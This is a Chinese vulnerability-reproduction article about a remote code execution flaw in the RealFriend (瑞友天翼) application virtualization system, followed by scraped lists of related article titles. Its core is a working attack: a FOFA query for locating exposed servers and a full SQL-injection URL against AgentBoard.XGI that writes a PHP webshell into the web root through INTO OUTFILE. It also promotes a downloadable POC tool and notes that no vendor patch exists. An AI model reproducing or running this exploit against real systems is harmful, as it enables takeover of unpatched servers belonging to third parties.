文章目录

  • 瑞友天翼应用虚拟化系统存在远程代码执行漏洞
    • 1. 瑞友天翼应用虚拟化系统简介
    • 2.漏洞描述
    • 3.影响版本
    • 4.fofa 查询语句
    • 5.漏洞复现
    • 6.POC&EXP
    • 7.整改意见
    • 8.往期回顾

瑞友天翼应用虚拟化系统存在远程代码执行漏洞

1. 瑞友天翼应用虚拟化系统简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

瑞友天翼应用虚拟化系统是具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。

2.漏洞描述

瑞友天翼应用虚拟化系统存在远程代码执行漏洞,攻击者可以利用此漏洞获WEB主机权限。

3.影响版本

4.fofa 查询语句

title=“瑞友天翼-应用虚拟化系统”

5.漏洞复现

先把去以下网址把你的需要写入的php代码转换成16进制

例如<?php phpinfo();?> 转换成16进制是

<?php phpinfo();?> 转换成16进制 3c3f70687020706870696e666f28293b3f3e

我需要把这个文件保存在根目录的 testtest.php文件内。
拼接你的文件名和php代码16进制值,得到如下地址,然后访问。

拼接得到如下地址

http://127.0.0.1/AgentBoard.XGI?user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2Ftesttest.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020706870696e666f28293b3f3e--%20-&cmd=UserLogin

访问以上链接后,webshell地址就保存在根目录下

http://127.0.0.1/testtest.php

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现20 即可获得该POC工具下载地址:

本次的poc加入了代理功能,方便各位师傅调试。

7.整改意见

厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: http://www.realor.cn

8.往期回顾

瑞友天翼应用虚拟化系统存在远程代码执行漏洞相关推荐

  1. 瑞友天翼应用虚拟化系统RCE漏洞复现+利用

    1.产品简介 瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台.它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可 ...

  2. Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞

    漏洞名称: 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞 English Name:Ruiyou Tianyi Application Virtualization System ...

  3. 如何外网登录访问瑞友天翼应用虚拟化系统?——快解析内网端口映射方案

    瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台.如何将内网平台提供到互联网上外网 ...

  4. 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)

    漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...

  5. [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  6. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  7. 泛微e-cology OA 系统远程代码执行漏洞

    声明 好好学习,天天向上 漏洞描述 2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞.攻击者通过调用BeanShell组件中未授权访问的问题接口 ...

  8. 【漏洞预警】泛微e-cology OA系统远程代码执行漏洞及其复现

    目录 0x00前言 0x01漏洞描述 0x02漏洞复现 0x03漏洞POC 0x04影响范围 0x05漏洞防护 0x06免责声明 0x00前言 2019年9月19日,泛微e-cology OA系统自带 ...

  9. 用友NC BeanShell远程代码执行漏洞复现

    用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...

最新文章

  1. 明文存密码成惯例?Facebook 6 亿用户密码可被 2 万员工直接看
  2. 如何用最强模型BERT做NLP迁移学习?
  3. 史上首次,强化学习算法控制核聚变登上Nature:DeepMind让人造太阳向前一大步...
  4. 物联网助推超市转型之具体应用分析
  5. java spring context_java将对象注册到spring context中 | 学步园
  6. java neo4j rest api_Neo4j REST API使用教程
  7. 从地址栏中敲入一个网址,到网页显示出来,这个过程经历了什么
  8. javascript的Foreach语法
  9. C++中类成员函数作为多线程的入口
  10. [Mac OSX技巧] 通过命令行开启安全性与隐私中的任何来源
  11. 萤火虫算法_第二十二章 萤火虫算法(Firefly Algorithm,FA)补充和答疑
  12. 纯前端实现页面的回到顶部和回到底部功能
  13. linux exclude用法,rsync的include和exclude用法
  14. python 表情包 gif,用 Python 开发一个【GIF表情包制作神器】
  15. csv用excel打开中文乱码
  16. 分析云计算应用究竟有哪些类型
  17. 硬件设计——MOS管实际应用详解
  18. java写网页_初次尝试通过java写简单网站
  19. Linux安装gitlab教程
  20. js混淆还原工具_js混淆解密 还原混淆方法

热门文章

  1. 二叉树前序、中序、后序遍历相互求法
  2. R语言机器学习mlr3:基础使用
  3. 学习笔记-Secure-Linux
  4. 数电基础:时序逻辑电路
  5. ant design vue 中Notification隐藏右上角叉号
  6. 九、产生珍宝,用于补血或升级子弹(雷霆战机)
  7. matlab绘制条形图:分组(grouped)与堆叠(stacked)混合作图
  8. 基于K-最近邻算法构建红酒分类模型
  9. 校验码——奇偶校验码详解,码距,例题
  10. 快速解决IP地址冲突问题的方法